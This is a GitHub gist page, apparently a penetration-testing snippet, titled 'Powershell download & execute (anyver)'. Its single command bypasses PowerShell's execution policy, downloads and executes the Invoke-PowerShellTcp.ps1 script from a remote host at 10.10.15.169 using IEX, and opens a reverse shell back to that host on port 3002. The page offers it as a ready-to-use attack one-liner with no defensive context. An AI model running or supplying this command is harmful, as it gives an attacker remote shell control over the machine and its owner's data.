Last active
November 19, 2021 12:29
-
-
Save intrd/feec7171aa7d172742b330f1f77f3edf to your computer and use it in GitHub Desktop.
Powershell download & execute (anyver)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Powershell download & execute (anyver) | |
# http://dann.com.br/ | |
# Invoke-PowerShellTcp.ps1 (Reverse powershell) - https://gist.github.com/intrd/d5086206bdef0ba1d7776c5325547626 | |
powershell.exe -NoProfile -ExecutionPolicy unrestricted -Command IEX (New-Object Net.WebClient).DownloadString('http://10.10.15.169:3001/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.10.15.169 -Port 3002 |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment